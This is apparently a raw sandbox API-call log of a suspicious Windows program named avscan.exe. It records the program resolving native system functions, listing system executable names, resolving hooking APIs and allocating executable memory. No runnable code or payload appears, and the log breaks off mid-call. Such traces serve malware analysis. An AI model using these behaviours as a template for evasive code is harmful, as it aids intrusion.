GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateSection") returned 0x77a7ff94 [0119.022] GetProcAddress (hModule=0x77a60000, lpProcName="ZwMapViewOfSection") returned 0x77a7fc40 [0119.022] GetProcAddress (hModule=0x77a60000, lpProcName="ZwUnmapViewOfSection") returned 0x77a7fc70 [0119.022] GetProcAddress (hModule=0x77a60000, lpProcName="ZwUnmapViewOfSectionEx") returned 0x0 [0119.023] GetProcAddress (hModule=0x77a60000, lpProcName="ZwReadFile") returned 0x77a7f8e0 [0119.023] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryInformationFile") returned 0x77a7fa00 [0119.023] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetInformationFile") returned 0x77a7fc28 [0119.023] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryAttributesFile") returned 0x77a7fe4c [0119.023] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQuerySection") returned 0x77a80040 [0119.023] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryFullAttributesFile") returned 0x77a8132c [0119.024] GetProcAddress (hModule=0x77a60000, lpProcName="ZwWriteFile") returned 0x77a7f918 [0119.024] GetProcAddress (hModule=0x77a60000, lpProcName="ZwDeviceIoControlFile") returned 0x77a7f8fc [0119.024] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetInformationObject") returned 0x77a80154 [0119.024] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryObject") returned 0x77a7f9e8 [0119.024] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryDirectoryFile") returned 0x77a7fd88 [0119.024] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryDirectoryFileEx") returned 0x0 [0119.025] GetProcAddress (hModule=0x77a60000, lpProcName="ZwOpenSection") returned 0x77a7fdb8 [0119.025] GetProcAddress (hModule=0x77a60000, lpProcName="ZwDuplicateObject") returned 0x77a7fe34 [0119.025] GetProcAddress (hModule=0x77a60000, lpProcName="ZwDeleteFile") returned 0x77a809d4 [0119.025] GetProcAddress (hModule=0x77a60000, lpProcName="ZwLockFile") returned 0x77a80e44 [0119.025] GetProcAddress (hModule=0x77a60000, lpProcName="ZwUnlockFile") returned 0x77a81ea8 [0119.025] GetProcAddress (hModule=0x77a60000, lpProcName="ZwTerminateProcess") returned 0x77a7fca0 [0119.026] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryVirtualMemory") returned 0x77a7fbc8 [0119.026] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryVolumeInformationFile") returned 0x77a7ff7c [0119.026] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetVolumeInformationFile") returned 0x77a81c8c [0119.026] GetProcAddress (hModule=0x77a60000, lpProcName="ZwAccessCheck") returned 0x77a80218 [0119.026] GetProcAddress (hModule=0x77a60000, lpProcName="ZwExtendSection") returned 0x77a80b0c [0119.027] GetProcAddress (hModule=0x77a60000, lpProcName="ZwFlushBuffersFile") returned 0x77a7ffac [0119.027] GetProcAddress (hModule=0x77a60000, lpProcName="ZwFsControlFile") returned 0x77a7fde8 [0119.027] GetProcAddress (hModule=0x77a60000, lpProcName="ZwNotifyChangeDirectoryFile") returned 0x77a80f48 [0119.027] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQuerySecurityObject") returned 0x77a81518 [0119.027] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetSecurityObject") returned 0x77a81b8c [0119.027] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateProcess") returned 0x77a80804 [0119.028] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateProcessEx") returned 0x77a7ffdc [0119.028] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateUserProcess") returned 0x77a8090c [0119.029] GetProcAddress (hModule=0x77a60000, lpProcName="ZwResumeThread") returned 0x77a80058 [0119.029] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateThread") returned 0x77a7fff4 [0119.029] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryInformationProcess") returned 0x77a7fac8 [0119.029] GetProcAddress (hModule=0x77a60000, lpProcName="ZwOpenKey") returned 0x77a7fa18 [0119.029] GetProcAddress (hModule=0x77a60000, lpProcName="ZwOpenKeyEx") returned 0x77a81008 [0119.029] GetProcAddress (hModule=0x77a60000, lpProcName="ZwEnumerateValueKey") returned 0x77a7fa30 [0119.030] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryKey") returned 0x77a7fa80 [0119.030] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryValueKey") returned 0x77a7fa98 [0119.030] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateKey") returned 0x77a7fb30 [0119.030] GetProcAddress (hModule=0x77a60000, lpProcName="ZwEnumerateKey") returned 0x77a7fd3c [0119.030] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetValueKey") returned 0x77a801b4 [0119.031] GetProcAddress (hModule=0x77a60000, lpProcName="ZwDeleteKey") returned 0x77a809ec [0119.031] GetProcAddress (hModule=0x77a60000, lpProcName="ZwDeleteValueKey") returned 0x77a80a34 [0119.031] GetProcAddress (hModule=0x77a60000, lpProcName="ZwFlushKey") returned 0x77a80b70 [0119.031] GetProcAddress (hModule=0x77a60000, lpProcName="ZwLoadKey") returned 0x77a80dfc [0119.031] GetProcAddress (hModule=0x77a60000, lpProcName="ZwLoadKey2") returned 0x77a80e14 [0119.032] GetProcAddress (hModule=0x77a60000, lpProcName="ZwNotifyChangeKey") returned 0x77a80f60 [0119.032] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryMultipleValueKey") returned 0x77a8146c [0119.032] GetProcAddress (hModule=0x77a60000, lpProcName="ZwReplaceKey") returned 0x77a81738 [0119.032] GetProcAddress (hModule=0x77a60000, lpProcName="ZwRestoreKey") returned 0x77a817d0 [0119.032] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSaveKey") returned 0x77a81864 [0119.033] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetInformationKey") returned 0x77a81a48 [0119.033] GetProcAddress (hModule=0x77a60000, lpProcName="ZwUnloadKey") returned 0x77a81e60 [0119.033] GetProcAddress (hModule=0x77a60000, lpProcName="ZwWaitForMultipleObjects") returned 0x77a80138 [0119.033] GetProcAddress (hModule=0x77a60000, lpProcName="ZwWaitForSingleObject") returned 0x77a7f8ac [0119.034] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCopyFileChunk") returned 0x0 [0119.034] GetLastError () returned 0x7f [0119.034] SetLastError (dwErrCode=0x7f) [0119.034] GetLastError () returned 0x7f [0119.034] SetLastError (dwErrCode=0x7f) [0119.034] GetLastError () returned 0x7f [0119.034] SetLastError (dwErrCode=0x7f) [0119.034] GetLastError () returned 0x7f [0119.034] SetLastError (dwErrCode=0x7f) [0119.092] VirtualFree (lpAddress=0x340000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0119.092] GetLastError () returned 0x7f [0119.092] SetLastError (dwErrCode=0x7f) [0119.092] GetLastError () returned 0x7f [0119.092] SetLastError (dwErrCode=0x7f) [0119.092] GetLastError () returned 0x7f [0119.092] SetLastError (dwErrCode=0x7f) [0119.093] GetLastError () returned 0x7f [0119.093] SetLastError (dwErrCode=0x7f) [0119.326] SysReAllocStringLen (in: pbstr=0x54e944*=0x0, psz="Registry", len=0x8 | out: pbstr=0x54e944*="Registry") returned 1 [0119.326] SysReAllocStringLen (in: pbstr=0x54e940*=0x0, psz="File", len=0x4 | out: pbstr=0x54e940*="File") returned 1 [0119.326] SysReAllocStringLen (in: pbstr=0x54dd3c*=0x0, psz="tcpsvcs.exe", len=0xb | out: pbstr=0x54dd3c*="tcpsvcs.exe") returned 1 [0119.326] SysReAllocStringLen (in: pbstr=0x54dd38*=0x0, psz="ntvdm.exe", len=0x9 | out: pbstr=0x54dd38*="ntvdm.exe") returned 1 [0119.326] SysReAllocStringLen (in: pbstr=0x54dd34*=0x0, psz="dllhost.exe", len=0xb | out: pbstr=0x54dd34*="dllhost.exe") returned 1 [0119.327] SysReAllocStringLen (in: pbstr=0x54dd30*=0x0, psz="replace.exe", len=0xb | out: pbstr=0x54dd30*="replace.exe") returned 1 [0119.327] SysReAllocStringLen (in: pbstr=0x54dd2c*=0x0, psz="regsvr32.exe", len=0xc | out: pbstr=0x54dd2c*="regsvr32.exe") returned 1 [0119.327] SysReAllocStringLen (in: pbstr=0x54dd28*=0x0, psz="winver.exe", len=0xa | out: pbstr=0x54dd28*="winver.exe") returned 1 [0119.327] SysReAllocStringLen (in: pbstr=0x54dd24*=0x0, psz="help.exe", len=0x8 | out: pbstr=0x54dd24*="help.exe") returned 1 [0119.327] SysReAllocStringLen (in: pbstr=0x54dd20*=0x0, psz="find.exe", len=0x8 | out: pbstr=0x54dd20*="find.exe") returned 1 [0119.327] SysReAllocStringLen (in: pbstr=0x54dd1c*=0x0, psz="compact.exe", len=0xb | out: pbstr=0x54dd1c*="compact.exe") returned 1 [0119.327] SysReAllocStringLen (in: pbstr=0x54dd18*=0x0, psz="chkdsk.exe", len=0xa | out: pbstr=0x54dd18*="chkdsk.exe") returned 1 [0119.327] SysReAllocStringLen (in: pbstr=0x54dd14*=0x0, psz="attrib.exe", len=0xa | out: pbstr=0x54dd14*="attrib.exe") returned 1 [0119.327] SysReAllocStringLen (in: pbstr=0x54dd10*=0x0, psz="write.exe", len=0x9 | out: pbstr=0x54dd10*="write.exe") returned 1 [0119.327] SysReAllocStringLen (in: pbstr=0x54dd0c*=0x0, psz="hh.exe", len=0x6 | out: pbstr=0x54dd0c*="hh.exe") returned 1 [0119.327] QueryPerformanceCounter (in: lpPerformanceCount=0x28fecc | out: lpPerformanceCount=0x28fecc*=3060015568252) returned 1 [0119.680] GetLastError () returned 0x0 [0119.681] SetLastError (dwErrCode=0x0) [0119.681] GetLastError () returned 0x0 [0119.681] SetLastError (dwErrCode=0x0) [0119.681] GetLastError () returned 0x0 [0119.681] SetLastError (dwErrCode=0x0) [0119.681] GetLastError () returned 0x0 [0119.682] SetLastError (dwErrCode=0x0) [0119.682] GetLastError () returned 0x0 [0119.682] SetLastError (dwErrCode=0x0) [0119.682] GetLastError () returned 0x0 [0119.682] SetLastError (dwErrCode=0x0) [0119.682] GetLastError () returned 0x0 [0119.682] SetLastError (dwErrCode=0x0) [0119.784] GetLastError () returned 0x0 [0119.784] SetLastError (dwErrCode=0x0) [0119.784] GetLastError () returned 0x0 [0119.785] SetLastError (dwErrCode=0x0) [0119.785] GetLastError () returned 0x0 [0119.785] SetLastError (dwErrCode=0x0) [0119.785] GetLastError () returned 0x0 [0119.785] SetLastError (dwErrCode=0x0) [0119.902] GetLastError () returned 0x0 [0119.902] SetLastError (dwErrCode=0x0) [0119.902] GetLastError () returned 0x0 [0119.903] SetLastError (dwErrCode=0x0) [0119.903] GetLastError () returned 0x0 [0119.903] SetLastError (dwErrCode=0x0) [0119.903] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0119.903] GetLastError () returned 0x0 [0119.904] SetLastError (dwErrCode=0x0) [0119.985] GetLastError () returned 0x0 [0119.986] SetLastError (dwErrCode=0x0) [0119.986] GetLastError () returned 0x0 [0119.986] SetLastError (dwErrCode=0x0) [0119.986] GetLastError () returned 0x0 [0119.986] SetLastError (dwErrCode=0x0) [0119.986] GetLastError () returned 0x0 [0119.986] SetLastError (dwErrCode=0x0) [0119.987] GetLastError () returned 0x0 [0119.987] SetLastError (dwErrCode=0x0) [0119.987] GetLastError () returned 0x0 [0119.987] SetLastError (dwErrCode=0x0) [0120.051] GetLastError () returned 0x0 [0120.052] SetLastError (dwErrCode=0x0) [0120.052] GetLastError () returned 0x0 [0120.053] SetLastError (dwErrCode=0x0) [0120.053] GetProcAddress (hModule=0x75a80000, lpProcName="GetModuleHandleA") returned 0x75a91245 [0120.053] GetLastError () returned 0x0 [0120.054] SetLastError (dwErrCode=0x0) [0120.124] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0120.124] GetProcAddress (hModule=0x75a80000, lpProcName="GetModuleHandleW") returned 0x75a93460 [0120.125] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0120.125] GetProcAddress (hModule=0x75a80000, lpProcName="CreateFileA") returned 0x75a9537e [0120.125] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0120.125] GetProcAddress (hModule=0x75a80000, lpProcName="CreateFileW") returned 0x75a93f0c [0120.125] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0120.126] GetProcAddress (hModule=0x75a80000, lpProcName="CreateFileMappingA") returned 0x75a954be [0120.126] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0120.126] GetProcAddress (hModule=0x75a80000, lpProcName="CreateFileMappingW") returned 0x75a918e9 [0120.126] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0120.126] GetProcAddress (hModule=0x75a80000, lpProcName="ReadFile") returned 0x75a93e83 [0120.126] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0120.127] GetProcAddress (hModule=0x75a80000, lpProcName="CloseHandle") returned 0x75a913f0 [0120.127] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0120.127] GetProcAddress (hModule=0x75a80000, lpProcName="GetFileSize") returned 0x75a9194e [0120.127] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0120.127] GetProcAddress (hModule=0x75a80000, lpProcName="SetFilePointer") returned 0x75a917b1 [0120.128] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0120.128] GetProcAddress (hModule=0x75a80000, lpProcName="MapViewOfFile") returned 0x75a918d1 [0120.128] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0120.128] GetProcAddress (hModule=0x75a80000, lpProcName="MapViewOfFileEx") returned 0x75a94c3b [0120.128] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0120.128] GetProcAddress (hModule=0x75a80000, lpProcName="UnmapViewOfFile") returned 0x75a91806 [0120.129] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0120.129] GetProcAddress (hModule=0x75a80000, lpProcName="LoadLibraryA") returned 0x75a9498f [0120.129] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0120.129] GetProcAddress (hModule=0x75a80000, lpProcName="LoadLibraryExA") returned 0x75a948cb [0120.129] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0120.129] GetProcAddress (hModule=0x75a80000, lpProcName="LoadLibraryW") returned 0x75a948e3 [0120.130] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0120.130] GetProcAddress (hModule=0x75a80000, lpProcName="LoadLibraryExW") returned 0x75a94915 [0120.130] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0120.130] GetProcAddress (hModule=0x75a80000, lpProcName="FreeLibrary") returned 0x75a93478 [0120.130] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0120.131] GetProcAddress (hModule=0x75a80000, lpProcName="FreeResource") returned 0x75aad3ab [0120.131] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0120.131] GetProcAddress (hModule=0x75a80000, lpProcName="GetVersion") returned 0x75a9441f [0120.131] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0120.131] GetProcAddress (hModule=0x75a80000, lpProcName="GetCurrentProcessId") returned 0x75a911f8 [0120.131] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0120.132] GetProcAddress (hModule=0x75a80000, lpProcName="GetCurrentProcess") returned 0x75a917e9 [0120.132] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0120.132] GetProcAddress (hModule=0x75a80000, lpProcName="GetCommandLineA") returned 0x75a95159 [0120.132] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0120.132] GetProcAddress (hModule=0x75a80000, lpProcName="GetCommandLineW") returned 0x75a951db [0120.132] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0120.133] GetProcAddress (hModule=0x75a80000, lpProcName="LockResource") returned 0x75a95911 [0120.133] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0120.133] GetProcAddress (hModule=0x75a80000, lpProcName="GetProcAddress") returned 0x75a91222 [0120.133] GetLastError () returned 0x0 [0120.133] SetLastError (dwErrCode=0x0) [0120.133] GetLastError () returned 0x0 [0120.134] SetLastError (dwErrCode=0x0) [0120.134] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0120.134] GetLastError () returned 0x0 [0120.134] SetLastError (dwErrCode=0x0) [0120.134] GetLastError () returned 0x0 [0120.134] SetLastError (dwErrCode=0x0) [0120.134] GetLastError () returned 0x0 [0120.134] SetLastError (dwErrCode=0x0) [0120.135] GetLastError () returned 0x0 [0120.135] SetLastError (dwErrCode=0x0) [0120.135] GetLastError () returned 0x0 [0120.135] SetLastError (dwErrCode=0x0) [0120.193] GetProcAddress (hModule=0x75a80000, lpProcName="UnhandledExceptionFilter") returned 0x75ab76f7 [0120.193] GetLastError () returned 0x0 [0120.193] SetLastError (dwErrCode=0x0) [0120.193] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0120.193] GetProcAddress (hModule=0x75a80000, lpProcName="DebugBreak") returned 0x75b14755 [0120.194] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0120.194] GetProcAddress (hModule=0x75a80000, lpProcName="FatalAppExitA") returned 0x75b14c31 [0120.194] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0120.194] GetProcAddress (hModule=0x75a80000, lpProcName="RtlRaiseException") returned 0x0 [0120.194] GetModuleHandleA (lpModuleName="user32.dll") returned 0x75980000 [0120.194] GetProcAddress (hModule=0x75980000, lpProcName="SetWindowsHookExA") returned 0x759a835c [0120.195] GetModuleHandleA (lpModuleName="user32.dll") returned 0x75980000 [0120.195] GetProcAddress (hModule=0x75980000, lpProcName="SetWindowsHookExW") returned 0x759a7603 [0120.195] GetModuleHandleA (lpModuleName="user32.dll") returned 0x75980000 [0120.195] GetProcAddress (hModule=0x75980000, lpProcName="UnhookWindowsHookEx") returned 0x759bf52b [0120.195] GetModuleHandleA (lpModuleName="user32.dll") returned 0x75980000 [0120.196] GetProcAddress (hModule=0x75980000, lpProcName="PeekMessageA") returned 0x759a5f74 [0120.196] GetModuleHandleA (lpModuleName="user32.dll") returned 0x75980000 [0120.196] GetProcAddress (hModule=0x75980000, lpProcName="CallNextHookEx") returned 0x759a6285 [0120.196] GetLastError () returned 0x7f [0120.196] SetLastError (dwErrCode=0x7f) [0120.844] HeapCreate (flOptions=0x0, dwInitialSize=0x88000, dwMaximumSize=0x88000) returned 0x35a0000 [0120.849] RtlAllocateHeap (HeapHandle=0x35a0000, Flags=0x0, Size=0x10000) returned 0x35a0590 [0120.849] RtlAllocateHeap (HeapHandle=0x35a0000, Flags=0x0, Size=0x10000) returned 0x35b0598 [0120.849] RtlAllocateHeap (HeapHandle=0x35a0000, Flags=0x0, Size=0x10000) returned 0x35c05a0 [0120.849] RtlAllocateHeap (HeapHandle=0x35a0000, Flags=0x0, Size=0x10000) returned 0x35d05a8 [0120.849] RtlAllocateHeap (HeapHandle=0x35a0000, Flags=0x0, Size=0x10000) returned 0x35e05b0 [0120.849] RtlAllocateHeap (HeapHandle=0x35a0000, Flags=0x0, Size=0x10000) returned 0x35f05b8 [0120.849] RtlAllocateHeap (HeapHandle=0x35a0000, Flags=0x0, Size=0x10000) returned 0x36005c0 [0120.849] RtlAllocateHeap (HeapHandle=0x35a0000, Flags=0x0, Size=0x10000) returned 0x36105c8 [0120.995] GetLastError () returned 0x7f [0120.995] SetLastError (dwErrCode=0x7f) [0120.995] GetLastError () returned 0x7f [0120.996] SetLastError (dwErrCode=0x7f) [0120.996] GetLastError () returned 0x7f [0120.996] SetLastError (dwErrCode=0x7f) [0121.105] VirtualAlloc (lpAddress=0x3334000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x40) returned 0x3334000 [0121.108] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0121.108] GetProcAddress (hModule=0x75a80000, lpProcName="GetVersionExA") returned 0x75a934c9 [0121.108] GetVersionExA (in: lpVersionInformation=0x28fc5c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x28fc78, dwMinorVersion=0x4, dwBuildNumber=0x42ed7e, dwPlatformId=0x28fca0, szCSDVersion="") | out: lpVersionInformation=0x28fc5c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0121.108] VirtualAlloc (lpAddress=0x3344000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x40) returned 0x3344000 [0121.111] GetSystemDirectoryW (in: lpBuffer=0x3341c98, uSize=0xfffe | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0121.111] SysReAllocStringLen (in: pbstr=0x28fdcc*=0x0, psz="C:\\Windows\\system32", len=0x13 | out: pbstr=0x28fdcc*="C:\\Windows\\system32") returned 1 [0121.111] SysReAllocStringLen (in: pbstr=0x28fdd0*=0x0, psz="C:\\Windows\\system32\\", len=0x14 | out: pbstr=0x28fdd0*="C:\\Windows\\system32\\") returned 1 [0121.111] GetThreadLocale () returned 0x409 [0121.112] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\system32\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0121.112] GetThreadLocale () returned 0x409 [0121.112] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\system32\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0121.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Windows\\system32\\", lpFilePart=0x28fa90*=0x0) returned 0x14 [0121.112] SysReAllocStringLen (in: pbstr=0x28fdd0*="C:\\Windows\\system32\\", psz="C:\\Windows\\system32\\", len=0x14 | out: pbstr=0x28fdd0*="C:\\Windows\\system32\\") returned 1 [0121.113] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Windows\\system32\\", len=0x14 | out: pbstr=0x28fcc0*="C:\\Windows\\system32\\") returned 1 [0121.113] CharLowerBuffW (in: lpsz="C:\\Windows\\system32\\", cchLength=0x14 | out: lpsz="c:\\windows\\system32\\") returned 0x14 [0121.113] SysReAllocStringLen (in: pbstr=0x28fdd0*="C:\\Windows\\system32\\", psz="c:\\windows\\system32\\", len=0x14 | out: pbstr=0x28fdd0*="c:\\windows\\system32\\") returned 1 [0121.113] SysReAllocStringLen (in: pbstr=0x33325b4*=0x0, psz="c:\\windows\\system32\\", len=0x14 | out: pbstr=0x33325b4*="c:\\windows\\system32\\") returned 1 [0121.113] GetWindowsDirectoryW (in: lpBuffer=0x3341c98, uSize=0xfffe | out: lpBuffer="C:\\Windows") returned 0xa [0121.113] SysReAllocStringLen (in: pbstr=0x28fdc0*=0x0, psz="C:\\Windows", len=0xa | out: pbstr=0x28fdc0*="C:\\Windows") returned 1 [0121.113] SysReAllocStringLen (in: pbstr=0x28fdc4*=0x0, psz="C:\\Windows\\", len=0xb | out: pbstr=0x28fdc4*="C:\\Windows\\") returned 1 [0121.114] GetThreadLocale () returned 0x409 [0121.114] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0121.114] GetThreadLocale () returned 0x409 [0121.114] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0121.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Windows\\", lpFilePart=0x28fa90*=0x0) returned 0xb [0121.114] SysReAllocStringLen (in: pbstr=0x28fdc4*="C:\\Windows\\", psz="C:\\Windows\\", len=0xb | out: pbstr=0x28fdc4*="C:\\Windows\\") returned 1 [0121.114] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Windows\\", len=0xb | out: pbstr=0x28fcc0*="C:\\Windows\\") returned 1 [0121.114] CharLowerBuffW (in: lpsz="C:\\Windows\\", cchLength=0xb | out: lpsz="c:\\windows\\") returned 0xb [0121.114] SysReAllocStringLen (in: pbstr=0x28fdc4*="C:\\Windows\\", psz="c:\\windows\\", len=0xb | out: pbstr=0x28fdc4*="c:\\windows\\") returned 1 [0121.114] SysReAllocStringLen (in: pbstr=0x33325b0*=0x0, psz="c:\\windows\\", len=0xb | out: pbstr=0x33325b0*="c:\\windows\\") returned 1 [0121.114] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x114bcc4, nSize=0x104 | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe")) returned 0x2f [0121.115] CharLowerBuffW (in: lpsz="C:\\Users\\KEECFM~1\\Ap", cchLength=0x14 | out: lpsz="c:\\users\\keecfm~1\\ap") returned 0x14 [0121.115] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", nBufferLength=0x104, lpBuffer=0x28fae4, lpFilePart=0x28fae0 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", lpFilePart=0x28fae0*="avscan.exe") returned 0x2f [0121.115] SysReAllocStringLen (in: pbstr=0x33325a8*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", len=0x2f | out: pbstr=0x33325a8*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe") returned 1 [0121.115] SysReAllocStringLen (in: pbstr=0x28fdb0*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", len=0x2f | out: pbstr=0x28fdb0*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe") returned 1 [0121.115] GetThreadLocale () returned 0x409 [0121.115] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0121.115] GetThreadLocale () returned 0x409 [0121.116] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0121.116] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", lpFilePart=0x28fa90*="avscan.exe") returned 0x2f [0121.116] SysReAllocStringLen (in: pbstr=0x28fdb0*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", psz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", len=0x2f | out: pbstr=0x28fdb0*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe") returned 1 [0121.116] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", nBufferLength=0x104, lpBuffer=0x28f7dc, lpFilePart=0x28f7d8 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", lpFilePart=0x28f7d8*="avscan.exe") returned 0x2f [0121.116] SysReAllocStringLen (in: pbstr=0x28fa1c*=0x0, psz="C:", len=0x2 | out: pbstr=0x28fa1c*="C:") returned 1 [0121.116] SysReAllocStringLen (in: pbstr=0x28f9d8*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28f9d8*="C:\\") returned 1 [0121.116] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0121.116] SysReAllocStringLen (in: pbstr=0x28f9d4*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", len=0x25 | out: pbstr=0x28f9d4*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 1 [0121.117] CharLowerBuffW (in: lpsz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", cchLength=0x25 | out: lpsz="c:\\users\\keecfm~1\\appdata\\local\\temp\\") returned 0x25 [0121.117] SetLastError (dwErrCode=0x0) [0121.117] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\keecfm~1\\appdata\\local\\temp\\", cchCount1=37, lpString2="c:\\", cchCount2=3) returned 3 [0121.117] GetLastError () returned 0x0 [0121.117] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp"), lpFindFileData=0x28fa40 | out: lpFindFileData=0x28fa40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x70, ftCreationTime.dwHighDateTime=0x28fa60, ftLastAccessTime.dwLowDateTime=0x775d4557, ftLastAccessTime.dwHighDateTime=0x5e, ftLastWriteTime.dwLowDateTime=0x114a834, ftLastWriteTime.dwHighDateTime=0x28fa78, 